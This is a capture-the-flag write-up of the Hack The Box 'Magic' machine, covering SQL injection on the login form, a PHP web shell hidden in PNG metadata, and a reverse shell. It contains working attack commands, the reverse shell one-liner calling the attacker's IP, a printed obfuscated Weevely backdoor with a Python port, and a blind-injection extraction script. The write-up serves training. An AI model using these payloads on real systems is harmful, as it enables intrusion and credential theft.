
1. User

root@Host-001:~# nmap -sC -sV  10.10.10.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 11:23 CEST
Nmap scan report for 10.10.10.185
Host is up (0.088s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds
root@Host-001:~#

Dirb:

root@Host-001:~# dirb http://10.10.10.185

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Apr 30 11:24:28 2020
URL_BASE: http://10.10.10.185/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.185/ ----
==> DIRECTORY: http://10.10.10.185/assets/                                     
==> DIRECTORY: http://10.10.10.185/images/                                     
+ http://10.10.10.185/index.php (CODE:200|SIZE:4589)                           
+ http://10.10.10.185/server-status (CODE:403|SIZE:277)                        
                                                                               
---- Entering directory: http://10.10.10.185/assets/ ----
==> DIRECTORY: http://10.10.10.185/assets/css/                                 
==> DIRECTORY: http://10.10.10.185/assets/js/                                  
                                                                               
---- Entering directory: http://10.10.10.185/images/ ----
==> DIRECTORY: http://10.10.10.185/images/uploads/                             
                                                                               
---- Entering directory: http://10.10.10.185/assets/css/ ----
==> DIRECTORY: http://10.10.10.185/assets/css/images/                          
                                                                               
---- Entering directory: http://10.10.10.185/assets/js/ ----
^C> Testing: http://10.10.10.185/assets/js/errordocs                           
root@Host-001:~# 

The home page on HTTP port 80 says at the bottom: Please login to upload

Link:

http://10.10.10.185/login.php

A standard username/password form. We intercept the request with Burp and try HTTP verb tampering (HACK and GET) without success, so we save the POST request to a file and run sqlmap on it. See HTTP Verb Tampering

root@Host-001:~/Bureau/htb/magic# sqlmap -r sqlmap_post.txt --risk=3
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:43:47 /2020-04-30/

[11:43:47] [INFO] parsing HTTP request from 'sqlmap_post.txt'
[11:43:47] [INFO] testing connection to the target URL
[11:43:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:43:48] [INFO] testing if the target URL content is stable
[11:43:48] [INFO] target URL content is stable
[11:43:48] [INFO] testing if POST parameter 'username' is dynamic
[11:43:49] [WARNING] POST parameter 'username' does not appear to be dynamic
[11:43:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[11:43:49] [INFO] testing for SQL injection on POST parameter 'username'
[11:43:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:43:50] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:43:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:43:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:52] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:43:53] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[11:43:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[11:43:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:43:55] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[11:43:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:43:55] [INFO] testing 'Generic inline queries'
[11:43:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[11:43:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[11:43:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[11:43:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:43:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:43:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:43:58] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[11:43:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:43:59] [INFO] testing 'Oracle AND time-based blind'
[11:43:59] [INFO] testing 'Oracle OR time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[11:45:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:45:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:45:10] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[11:45:11] [WARNING] POST parameter 'username' does not seem to be injectable
[11:45:11] [INFO] testing if POST parameter 'password' is dynamic
[11:45:11] [WARNING] POST parameter 'password' does not appear to be dynamic
[11:45:12] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[11:45:12] [INFO] testing for SQL injection on POST parameter 'password'
[11:45:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:45:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a 302 redirect to 'http://10.10.10.185:80/upload.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] n
[11:45:46] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=302)
[11:45:48] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] y
[11:46:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:46:11] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:46:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:46:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:46:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[11:46:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:46:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:46:12] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:46:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:46:12] [INFO] testing 'Generic inline queries'
[11:46:12] [INFO] testing 'MySQL inline queries'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:46:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:46:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:46:14] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:46:14] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:46:14] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:46:15] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:46:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:46:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[11:46:16] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[11:46:18] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[11:46:20] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[11:46:22] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[11:46:24] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[11:46:27] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[11:46:29] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[11:46:31] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[11:46:33] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[11:46:33] [INFO] checking if the injection point on POST parameter 'password' is a false positive
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 376 HTTP(s) requests:
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=test&password=-1376' OR 2751=2751 AND 'AhSJ'='AhSJ
---
[11:54:43] [INFO] testing MySQL
[11:54:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:54:43] [INFO] confirming MySQL
[11:54:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:54:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.185'

[*] ending @ 11:54:44 /2020-04-30/

root@Host-001:~/Bureau/htb/magic# 

sqlmap follows a redirect to http://10.10.10.185/upload.php, so a successful login lands on the upload page.

The password parameter is injectable (boolean-based blind), so we dump everything with --dump-all:

root@Host-001:~/Bureau/htb/magic# sqlmap -r sqlmap_post.txt --risk=3 --dump-all
(...)
[12:27:18] [INFO] resumed: Th3s3usW4sK1ng
[12:27:18] [INFO] resumed: admin
Database: Magic
Table: login
[1 entry]
+------+----------+----------------+
| id   | username | password       |
+------+----------+----------------+
| 1    | admin    | Th3s3usW4sK1ng |
+------+----------+----------------+

[12:27:18] [INFO] table 'Magic.login' dumped to CSV file '/root/.sqlmap/output/10.10.10.185/dump/Magic/login.csv'

Logging in (with the dumped credentials admin / Th3s3usW4sK1ng, or directly with the injection payload in the password field) gets us past login.php and onto upload.php.

shell.php is rejected: only jpg and png are accepted.

shell.php.png is rejected too, with the message 'What are you trying to do there?'. The extension alone is not enough: our shell.php.png (30 bytes, see the directory listing further down) is pure PHP with no image header, so the upload must be checking the file content as well.

So we take a real PNG and put the payload in its metadata with exiftool (note the quoting: inside the single-quoted argument, $_GET['cmd'] ends up as $_GET[cmd], which PHP still accepts as a bare-word constant):

root@Host-001:~/Bureau# exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' blank.png
root@Host-001:~/Bureau# mv blank.png blank.php.png
The file blank.php.png has been uploaded. 

http://10.10.10.185/images/uploads/blank.php.png?cmd=id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

http://10.10.10.185/images/uploads/blank.php.png?cmd=pwd

/var/www/Magic/images/uploads

http://10.10.10.185/images/uploads/blank.php.png?cmd=ls%20/var/www/Magic

assets
db.php5
id
images
index.php
login.php
logout.php
n30j1.php
upload.php

http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20/var/www/Magic/login.php

(The browser treats <?php as a bogus comment up to the first >, which is the one in $pdo->, so the top of the file is swallowed; use view-source: as done for db.php5 below to see the whole file.)

setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
            $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_OBJ);
            $stmt = $pdo->query("SELECT * FROM login WHERE username='$username' AND password='$password'");
            $user = $stmt->fetch();
            $count = 0;
            foreach ($user as $value) {
                $count += 1;
            }
            Database::disconnect();
            if ($count > 0) {
                $_SESSION['user_id'] = $user->id;
                header("Location: upload.php");
            } else {
                print("");
                //print('Wrong Username or Password');
            }
        } catch (PDOException $e) {
            //echo "Error: " . $e->getMessage();
            //echo "An SQL Error occurred!";
        }
    }
}
?>
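The query on the line `$stmt->query("SELECT * FROM login WHERE username='$username' AND password='$password'")` is the whole vulnerability: the form values are pasted into the SQL text. The following added example (mine, not from the writeup) reproduces that query against a constructed SQLite copy of the dumped Magic.login table, shows that the exact payload sqlmap reported and a plain `' OR 1=1-- -` both log in, shows the prepared-statement fix, and implements the boolean-based blind extraction sqlmap used to dump the password, where the only oracle is "did the login succeed". SQLite functions are used; the MySQL equivalents are noted in the code.

```python
import sqlite3


def make_db():
    """Constructed fixture: the Magic.login table as sqlmap dumped it (one row)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO login VALUES (1, 'admin', 'Th3s3usW4sK1ng')")
    return con


def login_vulnerable(con, username, password):
    """Same shape as login.php: user input is pasted straight into the SQL text."""
    query = f"SELECT * FROM login WHERE username='{username}' AND password='{password}'"
    return con.execute(query).fetchone() is not None


def login_fixed(con, username, password):
    """Prepared statement: the values are bound as data and never parsed as SQL."""
    query = "SELECT * FROM login WHERE username=? AND password=?"
    return con.execute(query, (username, password)).fetchone() is not None


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind extraction through a yes/no oracle, the way sqlmap recovered
    the table. oracle(p) is True when the form accepts password p (the 302 to upload.php).
    SQLite functions are used here; on MySQL the equivalents are LENGTH(), ORD() and MID()."""
    length = 0
    for n in range(1, max_len + 1):
        if oracle(f"x' OR length(({subquery}))={n} AND '1'='1"):
            length = n
            break
    chars = []
    for i in range(1, length + 1):
        lo, hi = 32, 126                      # printable ASCII, binary search per character
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"x' OR unicode(substr(({subquery}),{i},1))>{mid} AND '1'='1"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    sqlmap_payload = "-1376' OR 2751=2751 AND 'AhSJ'='AhSJ"
    print("vulnerable login with sqlmap payload:", login_vulnerable(db, "test", sqlmap_payload))
    print("fixed login with same payload:      ", login_fixed(db, "test", sqlmap_payload))
    print("blind dump of admin password:",
          blind_extract(lambda p: login_vulnerable(db, "test", p),
                        "SELECT password FROM login WHERE username='admin'"))
```

The blind routine needs about 7 requests per character plus one per candidate length, which matches the few hundred requests sqlmap reported for this dump; the parameterised version rejects every payload above because the quote never reaches the SQL parser.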

http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false

http://10.10.10.185/images/uploads/blank.php.png?cmd=ls%20-la%20/home/theseus/

total 84
drwxr-xr-x 15 theseus theseus 4096 Apr 16 02:58 .
drwxr-xr-x  3 root    root    4096 Oct 15  2019 ..
-rw-------  1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
lrwxrwxrwx  1 theseus theseus    9 Oct 21  2019 .bash_history -> /dev/null
-rw-r--r--  1 theseus theseus  220 Oct 15  2019 .bash_logout
-rw-r--r--  1 theseus theseus   15 Oct 21  2019 .bash_profile
-rw-r--r--  1 theseus theseus 3771 Oct 15  2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4096 Oct 22  2019 .config
drwx------  3 theseus theseus 4096 Oct 21  2019 .gnupg
drwx------  3 theseus theseus 4096 Oct 21  2019 .local
drwx------  2 theseus theseus 4096 Apr 30 01:17 .ssh
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Desktop
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Documents
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Downloads
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Music
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Pictures
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Public
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Templates
drwxr-xr-x  2 theseus theseus 4096 Oct 22  2019 Videos
-r--------  1 theseus theseus   33 Apr 30 00:41 user.txt

view-source:http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20%20/var/www/Magic/db.php5

class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

(...)

Reverse shell:

10.10.10.185/images/blank.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.90%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

With nc -nlvp 1234 listening on our side, this gives us an interactive shell as www-data.

The file ok.php found in the images directory:

<?php
$U='trlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);';
$p='$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_matc';
$='$k="f71dbe52";$kh="628a3f83a77a";$kf="b494817525c6";$p="';
$c='h("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==';
$i='1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(';
$X='$m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@ba';
$S='Cl2ULjIvWvX1ShJM";function x($t,$k){$c=strlen($k);$l=s';
$d='se64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}';
$j=str_replace('','','create_function');
$R=str_replace('','',$.$S.$U.$p.$c.$i.$X.$d);
$z=$j('',$R);$z();
?>

$k="f71dbe52";
$kh="628a3f83a77a";
$kf="b494817525c6";
$p="Cl2ULjIvWvX1ShJM";
function x($t,$k){
	$c=strlen($k);
	$l=strlen($t);
	$o="";
	for($i=0;$i<$l;){
		for($j=0;($j<$c&&$i<$l);$j++,$i++){
			$o.=$t{$i}^$k{$j};
		}
	}
	return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}

Running it only prints lambda_1 (the name create_function gives the generated function).

Note the `$=` line: the variable name was lost when the file was copied. De-obfuscated (second listing above), this is the agent that Weevely generates: it looks for the markers $kh and $kf in the raw POST body, base64-decodes, XORs with the key $k and gunzips what sits between them, eval()s the result, and sends the captured output back through the same transform prefixed with $p. It is not ours and not of direct use here.
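To show what that backdoor protocol actually does on the wire, here is an added example (mine, not from the writeup and not the Weevely client itself) that ports the agent's x() and its encode/decode chain to Python using the constants from ok.php. It never eval()s anything; it only builds and parses the request and response bodies. A practical use of this: the fixed prefix $p$kh in every response is a reliable signature for detecting the agent's traffic.

```python
import base64
import re
import zlib

# Constants copied from the ok.php agent on the page.
K = b"f71dbe52"
KH = "628a3f83a77a"
KF = "b494817525c6"
P = "Cl2ULjIvWvX1ShJM"


def x(t, k):
    """Port of the agent's x(): repeating-key XOR over raw bytes."""
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(t))


def wrap(data):
    """gzcompress -> x -> base64: the agent's outbound transform (and the client's inbound one).
    PHP's gzcompress produces zlib-format data, which is what zlib.compress produces too."""
    return base64.b64encode(x(zlib.compress(data), K)).decode()


def unwrap(blob):
    """base64_decode -> x -> gzuncompress: what the agent does before eval()."""
    return zlib.decompress(x(base64.b64decode(blob), K))


def client_request(php_code):
    """POST body a client sends: the PHP to execute, hidden between the $kh/$kf markers."""
    return KH + wrap(php_code.encode()) + KF


def agent_extract(body):
    """Agent side: preg_match("/$kh(.+)$kf/", php://input) and decode; None if no markers."""
    m = re.search(f"{KH}(.+){KF}", body)
    return unwrap(m.group(1)).decode() if m else None


def agent_response(output):
    """print("$p$kh$r$kf"): the captured eval() output, same transform, prefixed with $p."""
    return P + KH + wrap(output.encode()) + KF


def client_decode(body):
    """Client side: pull the response out of whatever page HTML surrounds it."""
    m = re.search(f"{P}{KH}(.+){KF}", body)
    return unwrap(m.group(1)).decode() if m else None


if __name__ == "__main__":
    req = client_request("echo shell_exec('id');")
    print("request body:", req[:48] + "...")
    print("agent would eval:", agent_extract(req))
    print("client reads back:", client_decode("<html>" + agent_response("uid=33(www-data)") + "</html>"))
```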

A handy command to get a real TTY from the dumb shell: /usr/bin/script -qc /bin/bash /dev/null

$ ls -la ok.php
-rw-r--r-- 1 www-data www-data 707 Apr 30 02:39 ok.php
$ su admin
su: must be run from a terminal
$ /usr/bin/script -qc /bin/bash /dev/null
www-data@ubuntu:/var/www/Magic/images$ sudo -l
sudo -l
[sudo] password for www-data: exit

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
www-data@ubuntu:/var/www/Magic/images$ su admin
su admin
No passwd entry for user 'admin'
www-data@ubuntu:/var/www/Magic/images$ su theseus
su theseus
Password: iamkingtheseus <-- the password from db.php5? Nope!

su: Authentication failure
www-data@ubuntu:/var/www/Magic/images$ su theseus
su theseus
Password: Th3s3usW4sK1ng                          <------- the admin password from the MySQL dump works: password reuse.


